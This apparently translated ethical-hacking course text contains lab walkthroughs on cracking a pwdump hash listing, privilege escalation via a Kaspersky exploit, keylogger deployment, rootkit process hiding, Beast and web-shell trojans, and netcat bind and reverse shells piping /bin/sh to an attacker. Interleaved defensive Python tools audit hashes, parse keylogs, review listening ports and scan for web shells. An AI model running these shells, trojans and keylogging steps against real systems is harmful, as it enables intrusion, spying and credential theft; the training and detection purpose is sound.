anhhaoceh:1019:B26C623F5254C6A311F64391B17C6CDE:98A2C048C77703D54BD0E88887EFD68E:::
ASPNET:1006:7CACBCC121AC203CD8652FE65BEA4486:7D34A6E7504DFAF453D4213660AE7D35:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
hack:1022:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB12283678:::
hacker:1018:BCE739534EA4E445AAD3B435B51404EE:5E7599F673DF11D5C5C4D950F5BF0157:::
hao123:1020:58F907D1C79C344DAAD3B435B51404EE:FD03071D41308B58B9DDBC6D5576D78D:::
haoceh:1016:B3FF8763A6B5CE26AAD3B435B51404EE:7AD94985F28454259BF2A03821FEC8DB:::
hicehclass:1023:B2BEF1B1582C2DC0AAD3B435B51404EE:D6198C25F8420A93301A5792398CF94C:::
IUSR_113SSR3JKXGW3N:1003:449913C1CEC65E2A97074C07DBD2969F:9E6A4AF346F1A1F4833ABFA52ADA9462:::
IWAM_113SSR3JKXGW3N:1004:4431005ABF401D86F92DBAC26FDFD3B8:188AA6E0737F12D16D60F8B64F7AE1FA:::
lylam:1012:EE94DC327C009996AAD3B435B51404EE:7A63FB0793A85C960A775497C9D738EE:::
quyen:500:A00B9194BEDB81FEAAD3B435B51404EE:5C800F13A3CE86ED2540DD4E7331E9A2:::
SUPPORT_388945a0:1001:NO PASSWORD*********************:F791B19C488F4260723561D4F484EA09:::
tam:1014:NO PASSWORD*********************:NO PASSWORD*********************:::
test:1017:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:::
vic123:1021:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB12283678:::
We see that the user quyen has ID 500, which is the ID of the administrator account on the system, and the Guest user has ID 501. Besides the information above, we also have the password hashes of the users; now we use the Cain program to recover the passwords of the other users.

Using a Brute Force attack against the user hiclassceh, we find that the password is 1234a.

This password is only 5 characters long and is easily brute-forced; however, for strong passwords (containing upper- and lower-case letters, digits and special characters) it takes much longer.
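As an added example (not part of the course material), the following Python script audits a pwdump-style dump for the weaknesses this exercise relies on: it flags RID 500 (built-in Administrator) and RID 501 (Guest), accounts with no password set, and accounts whose stored LM hash ends in the well-known empty-half constant AAD3B435B51404EE, which means the password is at most 7 characters and trivially brute-forced. The sample dump is constructed with placeholder hashes.

```python
import re

# Well-known LM constants (not page values): the DES of the LM magic string under a
# zero key half, which is what an empty 7-char half hashes to.
EMPTY_LM_HALF = "AAD3B435B51404EE"
EMPTY_LM_HASH = EMPTY_LM_HALF * 2                    # LM hash of an empty password
EMPTY_NT_HASH = "31D6CFE0D16AE931B73C59D7E0C089C0"   # NT hash of an empty password

# pwdump line layout: user:RID:LMhash:NThash:::
PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([^:]*):([^:]*):")

def audit_pwdump(dump_text):
    """Return {username: [findings]} for accounts that deserve attention."""
    report = {}
    for line in dump_text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if not m:
            continue
        user, rid = m.group(1), int(m.group(2))
        lm, nt = m.group(3).upper(), m.group(4).upper()
        findings = []
        if rid == 500:
            findings.append("RID 500: built-in Administrator (renaming does not change the RID)")
        if rid == 501:
            findings.append("RID 501: built-in Guest")
        if ("NO PASSWORD" in lm and "NO PASSWORD" in nt) or nt == EMPTY_NT_HASH:
            findings.append("no password set")
        elif "NO PASSWORD" in lm or lm == EMPTY_LM_HASH:
            findings.append("LM hash not stored (good: NoLMHash or password > 14 chars)")
        elif lm.endswith(EMPTY_LM_HALF):
            findings.append("LM hash stored and password <= 7 chars: trivially brute-forced")
        elif len(lm) == 32:
            findings.append("LM hash stored: password splits into two 7-char halves, crackable")
        if findings:
            report[user] = findings
    return report

# Constructed sample dump; the hex values are placeholders, not real hashes.
SAMPLE_DUMP = """\
Administrator:500:0123456789ABCDEFAAD3B435B51404EE:0123456789ABCDEF0123456789ABCDEF:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
svc_backup:1001:NO PASSWORD*********************:0123456789ABCDEF0123456789ABCDEF:::
lab:1022:0123456789ABCDEF0123456789ABCDEF:FEDCBA98765432100123456789ABCDEF:::
"""

if __name__ == "__main__":
    for user, findings in audit_pwdump(SAMPLE_DUMP).items():
        print(user, "->", "; ".join(findings))
```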
Lab 3: Privilege escalation through the Kaspersky Lab program
To escalate privileges on a system, a hacker must exploit some vulnerability, either in the operating system or in third-party software; in this case we escalate privileges through the Kaspersky Lab antivirus program. To prepare this lab, we go to the website www.milw0rm.com to find information about this exploit code.

Then we use this code, compile it into an exe file and attack the target machine. To carry out the lab, we need to install the Kaspersky software on the machine. After installation, we add an ordinary user to the machine and log on as this user; in this lesson we use the user hao with the password hao.

Run the compiled exe file to exploit the running Kaspersky process and obtain system admin rights.

Use the command telnet 127.0.0.1 8080 to access a shell with system admin rights. We then use the command Net Localgroup administrators hao /add to add the user hao to the admin group, and use the command net user to confirm:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\WINDOWS\system32>
D:\WINDOWS\system32>net Localgroup administrators hao /add
net Localgroup administrators hao /add
The command completed successfully.

D:\WINDOWS\system32>net user hao
net user hao
User name                    hao
Full Name
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            8/3/2007 1:47 PM
Password expires             9/15/2007 12:35 PM
Password changeable          8/3/2007 1:47 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   8/3/2007 1:54 PM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Users
Global Group memberships     *None
The command completed successfully.

D:\WINDOWS\system32>
We see that the user hao now has Admin rights on the system, and the privilege escalation has succeeded. You can test similar programs using code downloaded from www.milw0rm.com.
Lab 4: Using a Keylogger
In this lab we use the SC Keylogger program to collect information from the victim's machine; the tasks are to create the keylog file, choose the mail relay server, and install it on the victim. After installing the keylogger software, we start configuring our keylogger. First we choose the actions to be logged, including keyboard, mouse, and running programs.

Next we choose the email address to which the victim's machine will send this log file. This information is sent once every 10 minutes.

Next we configure the mail relay server and the process name to display; for this part hackers usually use names resembling existing Windows services such as svchost.exe, csrss.exe, etc. to deceive the admin. For easy identification we choose the file name cehkeylogger.

After creating the keylogger, we run it on the victim's machine. We pick a Win XP machine, run the program on it, and suppose that afterwards the following text is typed:

After waiting about 10 minutes we will see the log file sent back as follows:

>> C:\WINDOWS\system32\notepad.exe
<< 05-08-07 11:39:23 Untitled - Notepad
>> Chuc lop Sec<BS><BS><BS>CEH manh khoe, va nhieu thanh dat..
<< 05-08-07 11:39:36 Untitled - Notepad
>> Chuc lop CEH hoc gioi
<< 05-08-07 11:39:41 Untitled - Notepad
>>::::::::::<PRNTSCR><ALT>
<< 05-08-07 11:39:56 Run
>> <WIN-START>ms<DOWN>
<< 05-08-07 11:39:59 Process started
>> C:\WINDOWS\system32\mspaint.exe

From the above, we can see that the keylogger can record almost all the information on the victim's PC, especially sensitive information such as credit cards, accounts, etc. The author advises you to use this knowledge for research purposes only and not to use this program for bad purposes.
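As an added example (not part of the course material), the following Python parser reads a log in the format shown above: ">>" lines carry keystrokes and "<<" lines carry a timestamp and window title. It replays <BS> edits, drops the other control tokens, and attributes the reconstructed text to the window it was typed in, which is what an analyst needs when reviewing such a log recovered from an infected machine. The sample log is constructed from the lines above; the assumption that each "<<" line opens the context for the ">>" lines after it is mine, not the tool's documented format.

```python
import re

TOKEN_RE = re.compile(r"<([A-Z\-]+)>")   # control tokens such as <BS>, <ALT>, <WIN-START>

def apply_keys(raw):
    """Replay a '>>' keystroke string: <BS> deletes the previous character,
    every other control token is dropped, plain characters are kept."""
    out = []
    pos = 0
    for m in TOKEN_RE.finditer(raw):
        out.extend(raw[pos:m.start()])
        if m.group(1) == "BS" and out:
            out.pop()
        pos = m.end()
    out.extend(raw[pos:])
    return "".join(out)

def parse_keylog(text):
    """Return [(timestamp, window_title, reconstructed_text), ...].
    Assumption: a '<<' line opens a context (timestamp + window title) and the
    '>>' lines that follow belong to it; '>>' lines before any '<<' get no context."""
    entries = []
    stamp, title = None, "(unknown)"
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("<<"):
            parts = line[2:].strip().split(" ", 2)
            stamp = " ".join(parts[:2])
            title = parts[2] if len(parts) > 2 else ""
        elif line.startswith(">>"):
            typed = apply_keys(line[2:].strip())
            if typed:
                entries.append((stamp, title, typed))
    return entries

# Constructed sample, copied from the log shown above (raw string: paths contain backslashes).
SAMPLE_LOG = r"""
>> C:\WINDOWS\system32\notepad.exe
<< 05-08-07 11:39:23 Untitled - Notepad
>> Chuc lop Sec<BS><BS><BS>CEH manh khoe, va nhieu thanh dat..
<< 05-08-07 11:39:36 Untitled - Notepad
>> Chuc lop CEH hoc gioi
<< 05-08-07 11:39:41 Untitled - Notepad
>>::::::::::<PRNTSCR><ALT>
<< 05-08-07 11:39:56 Run
>> <WIN-START>ms<DOWN>
<< 05-08-07 11:39:59 Process started
>> C:\WINDOWS\system32\mspaint.exe
"""

if __name__ == "__main__":
    for stamp, title, typed in parse_keylog(SAMPLE_LOG):
        print(f"[{stamp}] {title!r}: {typed}")
```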
Lab 5: Using a Rootkit and deleting Log files
A rootkit is a program that hides the activity of keyloggers and trojans, making it difficult for the system admin to detect them. In this exercise we use Fu Rootkit to hide the process of the keylogger we installed in the previous lesson; we use the tasklist command to view the processes running on the computer.

As we see in the figure, the process cehkeyloger.exe has PID 1236; now we hide this process with the command fu -ph 1236 and then view the processes again with the tasklist command.

We see that the keylogger has disappeared from tasklist; at this point, to detect it accurately, the admin should use antivirus programs, control access, and run rootkit-checking programs on the machine such as a rootkit detector.

Lesson 4:

TROJAN and BACKDOOR
I/ Introduction to Trojans and Backdoors:
Trojans and Backdoors are used to monitor the victim's machine and are the back door through which a Hacker can re-enter the computer system, either through a connection port or through the Web environment (web-based). The port-based kind we commonly see includes netcat, beast, Donald Dick, etc., and the web-based kind commonly includes r57, c99, zehir4, etc. A characteristic of port-connecting Trojans is that every connection requires an open port, so the admin detects them relatively more easily than the web-based kind (which usually targets Web Servers). In this exercise we try out the features of netcat, beast, c99 and zehir4 and analyze a sample piece of trojan code.
II/ Exercises:
Exercise 1: Using netcat:
1/ Using netcat to connect to a shell
On the victim's computer, start netcat in listening mode, using the option -l (listen) and -p port to specify the port number to listen on; -e <program_to_run> tells netcat to execute a program when a connection arrives, usually the command shell cmd.exe (on NT) or /bin/sh (on Unix).
E:\>nc -nvv -l -p 8080 -e cmd.exe
listening on [any] 8080 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
sent 0, rcvd 0: unknown socket error
- On the attacking computer, you just use netcat to connect to the victim's machine on the specified port, for example 8080:
C:\>nc -nvv 172.16.84.2 8080
(UNKNOWN) [172.16.84.2] 8080 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
Copyright 1985-1999 Microsoft Corp.
E:\>cd test
cd test
E:\test>dir /w
dir /w
Volume in drive E has no label.
Volume Serial Number is B465-452F
Directory of E:\test
[.] [..] head.log NETUSERS.EXE NetView.exe
ntcrash.zip password.txt pwdump.exe
6 File(s) 262,499 bytes
2 Dir(s) 191,488,000 bytes free
C:\test>exit
exit
sent 20, rcvd 450: NOTSOCK
Now we have a shell and control of the victim's machine. However, after the connection above, netcat on the victim's machine terminates as well. To make netcat listen again after each connection, use -L instead of -l. Note: -L is only available in Netcat for Windows, not in the version running on Linux.
2/ Using netcat for a reverse shell to bypass the Firewall:
- Use telnet to connect to the listening netcat windows, feed the commands from one window into the reverse telnet stream, and send the results to the other window.
For example:
- On the attacking machine (172.16.84.1), open 2 netcat windows listening on ports 80 and 25 respectively:
+ Netcat window (1)
C:\>nc -nvv -l -p 80
listening on [any] 80 ...
connect to [172.16.84.1] from <UNKNOWN> [172.16.84.2] 1055
pwd
ls -la
_

+ Netcat window (2)
C:\>nc -nvv -l -p 25
listening on [any] 25 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.2] 1056
/
total 171
drwxr-xr-x 17 root root 4096 Feb 5 16:15 .
drwxr-xr-x 17 root root 4096 Feb 5 16:15 ..
drwxr-xr-x 2 root root 4096 Feb 5 08:55 bin
drwxr-xr-x 3 root root 4096 Feb 5 14:19 boot
drwxr-xr-x 13 root root 106496 Feb 5 14:18 dev
drwxr-xr-x 37 root root 4096 Feb 5 14:23 etc
drwxr-xr-x 6 root root 4096 Feb 5 08:58 home
drwxr-xr-x 6 root root 4096 Feb 5 08:50 lib
drwxr-xr-x 2 root root 7168 Dec 31 1969 mnt
drwxr-xr-x 4 root root 4096 Feb 5 16:18 n = ?
drwxr-xr-x 2 root root 4096 Aug 23 12:03 opt
dr-xr-xr-x 61 root root 0 Feb 5 09:18 proc
drwx------ 12 root root 4096 Feb 5 16:24 root
drwxr-xr-x 2 root root 4096 Feb 5 08:55 sbin
drwxrwxrwt 9 root root 4096 Feb 5 16:25 tmp
drwxr-xr-x 13 root root 4096 Feb 5 08:42 usr
drwxr-xr-x 18 root root 4096 Feb 5 08:52 var


- On the victim's computer (172.16.84.2), reverse telnet to the attacking machine (172.16.84.1), using /bin/sh to produce the output:
[root@nan_nhan /]# telnet 172.16.84.1 80 | /bin/sh | telnet 172.16.84.1 25
/bin/sh: Trying: command not found
/bin/sh: Connected: command not found
/bin/sh: Escape: command not found
Trying 172.16.84.1...
Connected to 172.16.84.1.
Escape character is '^]'.
_
Telnet on the victim's machine passes everything we type into Netcat window (1) - port 80 to /bin/sh for execution. The output of /bin/sh is sent back to the attacking computer in Netcat window (2) - port 25. Your only task is to type commands into Netcat window (1) and watch the results in Netcat window (2).
The reason I chose ports 80 and 25 is that these ports are usually not filtered by firewalls or filters.
Exercise 2: Using the Beast Trojan and detecting the trojan.
To use the Beast Trojan, we need to build a Server file to install on the victim's machine; this server file then listens on fixed ports, and from the attacking machine we connect to the victim's machine through this port.
Select the Beast trojan on the CD and run the trojan builder.

We can also use features such as AV-FW kill to disable the Firewall on the target machine, or inject into another file such as notepad.exe or explorer as a dll. We use the Save Server button to generate the file server.exe, run the file on the victim's machine and check the victim's task manager to see that the Trojan is actually running.
Now we use the program on the attacking machine to connect to the Server file running on the victim's machine.

We try some features such as the file manager to download the files we need from the victim's machine, or you can shut down or reboot the victim's machine through the features of the Windows tab.

Countermeasures: Besides using Anti Virus and anti-Trojan programs, we can rely on the common property that these Trojans must open some port to the outside; we can check this with the CurrPorts program or the fport program.
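As an added example (not part of the course material), the following Python function reviews listening-port output in fport's layout (PID, process, port, protocol, path) and flags the listeners this exercise tells you to look for: a process that should never hold a socket (the notepad.exe injection above), a listener running from a user-writable directory, or a port not in the admin's baseline. The baseline, the name lists and the sample output are constructed assumptions to be tuned per host.

```python
import re
import ntpath

# fport-style line: "<pid>  <process>  ->  <port>  <proto>  <path>" (path may be empty)
FPORT_RE = re.compile(r"^(\d+)\s+(\S+)\s+->\s+(\d+)\s+(TCP|UDP)\s*(.*)$")

# Assumed baseline of listeners expected on this lab host; tune per machine.
EXPECTED_LISTENERS = {("system", 139), ("system", 445), ("svchost.exe", 135), ("inetinfo.exe", 80)}
# Programs that have no business holding a listening socket (the injection targets named above).
NEVER_LISTENS = {"notepad.exe", "explorer.exe", "mspaint.exe", "calc.exe"}
# A service listening from one of these locations is suspicious on its own.
SUSPICIOUS_DIRS = ("\\temp\\", "\\documents and settings\\", "\\users\\", "\\recycler\\")

def review_fport(output):
    """Return [(pid, process, port, proto, reason)] for listeners worth investigating."""
    findings = []
    for line in output.splitlines():
        m = FPORT_RE.match(line.strip())
        if not m:
            continue
        pid, proc, port, proto, path = m.groups()
        port = int(port)
        name = (ntpath.basename(path) if path else proc).lower()
        if name != "system" and not name.endswith(".exe"):
            name += ".exe"                     # fport prints names without the extension
        if name in NEVER_LISTENS:
            reason = "process never legitimately listens; likely injected or hijacked"
        elif any(d in path.lower() for d in SUSPICIOUS_DIRS):
            reason = "listener runs from a user-writable directory"
        elif (name, port) not in EXPECTED_LISTENERS:
            reason = "listener not in the expected baseline"
        else:
            continue
        findings.append((int(pid), name, port, proto, reason))
    return findings

# Constructed sample in fport's layout; PIDs, ports and paths are made up.
SAMPLE_FPORT = r"""
Pid   Process            Port  Proto Path
4     System         ->  139   TCP
4     System         ->  445   TCP
1036  svchost        ->  135   TCP   C:\WINDOWS\system32\svchost.exe
1180  inetinfo       ->  80    TCP   C:\WINDOWS\system32\inetsrv\inetinfo.exe
1512  notepad        ->  6666  TCP   C:\WINDOWS\system32\notepad.exe
1644  cehclass       ->  9871  TCP   C:\Documents and Settings\hao\Local Settings\Temp\cehclass.exe
"""

if __name__ == "__main__":
    for pid, name, port, proto, reason in review_fport(SAMPLE_FPORT):
        print(f"PID {pid} {name} {proto}/{port}: {reason}")
```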

Based on the information CurrPorts provides, we can find the path of the file cehclass.exe, delete it, and remove its entries in regedit, startup, etc.
Exercise 3: Using web-based Trojans
Web-based trojans are more common in the web environment: after a hacker exploits a vulnerability and takes control of a Web Server, the hacker leaves behind a web-based trojan, through which the hacker can get back into the system later. A characteristic of this kind of Trojan is that it is very hard to detect, because it runs as a web page and uses system-access functions through languages such as asp, php, etc., so it cannot be detected as easily as connecting trojans like netcat, beast, etc.
To carry out this lab we first have to install Web Servers, namely IIS and Apache.
1/ Web-based Trojan in ASP: We use the IIS Web Server with Trojans written in this language; the author introduces 2 typical trojans, cmd.asp and zehir4.asp.
First install the IIS Web service (installation is quite simple; students can do this part themselves), then copy the 2 files into the www directory to access them through the Web.

We type the Dir command to view information about the files on the system; with a trojan like the one above we can view system information, upload and download via tftp, and add users to the system, for example with net user hao hao /add and net Localgroup administrators hao /add.
Go to the link http://192.168.1.116/zehir4.asp to see the second web-based trojan.

We see that this Trojan is more elaborate and convenient: fetching and deleting files is done entirely through the web, and we can easily operate on the victim's machine.
2/ Trojan in PHP: We use the Apache Web server with trojans written in this language; the author introduces the typical trojan c99.
First use the phpeasy program to install the following 3 packages together: apache, php, and mysql. However, in this lesson you only need php and apache. Copy the trojan files into the www directory to be able to run them.

This is a very dangerous trojan file: it can download and upload files, and also lets us run applications such as perl, execute system functions, provide information about the current victim, etc. Because of these properties this Trojan is used very widely by hackers (there are also r57, phpshell, etc.).
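As an added example (not part of the course material), the following Python scanner walks a web root and labels each .asp/.aspx/.php file that matches indicators typical of the shells in this exercise: ASP pages that create WScript.Shell or Shell.Application objects and feed Request parameters to Exec, PHP pages that call system(), passthru(), shell_exec() or eval() on request input, and file names of known shells (cmd.asp, zehir4.asp, c99.php, r57.php). The web root and its files are constructed in a temporary directory, and the indicator list is an assumed starting point, not a complete signature set.

```python
import os
import re
import tempfile

# Indicators typical of the shells named in this lesson (assumed starting list).
INDICATORS = [
    ("shell-object", re.compile(r'CreateObject\s*\(\s*"(WScript\.Shell|Shell\.Application)"', re.I)),
    ("request-to-exec", re.compile(r"\.Exec\s*\(.*Request", re.I)),
    ("exec-function", re.compile(r"\b(system|passthru|shell_exec|exec|popen|proc_open)\s*\(", re.I)),
    ("eval-on-input", re.compile(r"\beval\s*\(.*\$_(GET|POST|REQUEST|COOKIE)", re.I)),
    ("upload-handler", re.compile(r"\bmove_uploaded_file\s*\(", re.I)),
]
KNOWN_SHELL_NAMES = {"cmd.asp", "zehir4.asp", "c99.php", "r57.php", "phpshell.php"}

def scan_webroot(root):
    """Return {relative_path: [labels]} for every .asp/.aspx/.php file that trips an indicator."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith((".asp", ".aspx", ".php")):
                continue
            full = os.path.join(dirpath, fname)
            with open(full, "r", encoding="utf-8", errors="ignore") as fh:
                body = fh.read()
            labels = [label for label, rx in INDICATORS if rx.search(body)]
            if fname.lower() in KNOWN_SHELL_NAMES:
                labels.append("known-shell-filename")
            if labels:
                hits[os.path.relpath(full, root).replace(os.sep, "/")] = labels
    return hits

def build_sample_webroot():
    """Constructed web root in a temp directory: one benign page and two shell-like pages."""
    root = tempfile.mkdtemp(prefix="wwwroot_")
    samples = {
        "index.php": "<?php echo 'Hello ' . htmlspecialchars($_GET['name']); ?>",
        "tools/x.php": "<?php echo shell_exec($_GET['cmd']); ?>",
        "cmd.asp": '<% Set sh = Server.CreateObject("WScript.Shell")\n'
                   'Set ex = sh.Exec("cmd.exe /c " & Request("cmd")) %>',
    }
    for rel, body in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for rel, labels in sorted(scan_webroot(build_sample_webroot()).items()):
        print(rel, "->", ", ".join(labels))
```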
